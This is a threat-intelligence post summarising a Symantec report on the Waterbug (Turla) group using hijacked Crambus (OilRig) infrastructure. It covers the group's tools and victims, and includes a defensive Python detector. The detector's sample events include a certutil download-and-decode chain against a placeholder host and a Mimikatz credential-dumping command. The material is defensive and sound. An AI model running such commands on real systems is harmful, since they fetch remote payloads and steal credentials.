Waterbug APT Hijacking Infrastructure of Crambus APT group

The Waterbug APT group (aka Turla) has been using hijacked infrastructure belonging to the Crambus APT group (aka OilRig, APT34) to attack governments and international organizations. According to the Symantec report published on 20 June 2019, Waterbug has been targeting governments and international organizations since early 2018, with victims in Europe, Latin America, the Middle East and South Asia.

Waterbug has targeted governments and international organisations in three distinct campaigns. In the first campaign the group used a backdoor named Neptun (Backdoor.Whisperer) against Microsoft Exchange servers. Neptun is installed on the Exchange server and passively listens for commands from the attackers; it can also download additional tools, upload stolen files and execute shell commands. In the second campaign Waterbug used a modified version of the Meterpreter backdoor, and in the third campaign a custom RPC backdoor.

Waterbug's toolset in these campaigns includes new custom malware and modified versions of publicly available hacking tools. Symantec reports: “Aside from new tools already mentioned above, Waterbug has also deployed:

1. A new custom dropper typically used to install Neptun as a service.

2. A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.

3. A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.

4. Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.

5. PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.

6. Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.”

According to the Symantec report, Waterbug hijacked infrastructure from the Crambus APT group. Symantec also notes that although Waterbug and Crambus are attributed to different nations, the two groups may be collaborating; however, the report offers no evidence to support this possibility. During these campaigns the Mimikatz tool was downloaded onto the victim's network through the Powruner tool and the Poison Frog control panel on Crambus network infrastructure.

Symantec believes the heavily modified Mimikatz variant belongs to Waterbug rather than Crambus: “Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for.”

Symantec also reports that the victim's network was attacked with IntelliAdmin, a tool previously used by the Crambus APT group. Taken together, these observations suggest that Waterbug may have hijacked the infrastructure of the Crambus APT group.
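Two of the tools discussed above leave command-line evidence that defenders can hunt for: Certutil.exe used to download and decode remote files, and the stripped-down Mimikatz that kept only sekurlsa::logonpasswords. The following Python is an added example (not from the Symantec report or this post) that runs those checks over constructed process-creation events; the host names, file paths and URL are made up.

```python
import re

# Constructed sample process-creation events (not taken from the Symantec report).
# The fields mimic a Windows Security 4688 / Sysmon Event ID 1 export; hosts, paths
# and the URL are made up.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "certutil -urlcache -split -f https://example.invalid/update.txt payload.b64"},
    {"host": "ws01", "cmdline": "certutil -decode payload.b64 svc.exe"},
    # legitimate admin use: chain validation, no cached download and no decode
    {"host": "ws02", "cmdline": "certutil -verify -urlfetch server.cer"},
    {"host": "ws03", "cmdline": "m.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "ws04", "cmdline": "notepad.exe notes.txt"},
]

# Each rule is (name, compiled regex). Lookaheads make the switch order irrelevant,
# and certutil accepts both '-' and '/' as switch prefixes.
RULES = [
    # certutil as downloader: -urlcache together with -f and a URL argument
    ("certutil_download",
     re.compile(r"certutil(?=.*[-/]urlcache\b)(?=.*[-/]f\b)(?=.*https?://)", re.I)),
    # certutil as base64/hex decoder, the second half of download-then-decode
    ("certutil_decode",
     re.compile(r"certutil(?=.*[-/]decode(hex)?\b)", re.I)),
    # the one Mimikatz module the report says survived in Waterbug's stripped variant
    ("mimikatz_logonpasswords",
     re.compile(r"sekurlsa::logonpasswords", re.I)),
]


def detect(events):
    """Return (host, rule_name, cmdline) for every event matching any rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits


def hosts_with_download_and_decode(hits):
    """Hosts on which both halves of the certutil chain were seen. Either stage alone
    can be routine administration; the pair on one host is far stronger evidence."""
    seen = {}
    for host, name, _ in hits:
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items()
                  if {"certutil_download", "certutil_decode"} <= names)


if __name__ == "__main__":
    for host, name, cmd in detect(SAMPLE_EVENTS):
        print(f"{host:<5} {name:<24} {cmd}")
    print("download+decode on:", hosts_with_download_and_decode(detect(SAMPLE_EVENTS)))
```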

Who are the targets of this campaign?

1. The Ministry of Foreign Affairs of a Latin American country

2. The Ministry of Foreign Affairs of a Middle Eastern country

3. The Ministry of Foreign Affairs of a European country

4. The Ministry of the Interior of a South Asian country

5. Two unidentified government organizations in a Middle Eastern country

6. One unidentified government organization in a Southeast Asian country

7. A government office of a South Asian country based in another country

8. An information and communications technology organization in a Middle Eastern country

9. Two information and communications technology organizations in two European countries

10. An information and communications technology organization in a South Asian country

11. A multinational organization in a Middle Eastern country

12. An educational institution in a South Asian country

Indicators of Compromise


To read the full report, please visit https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments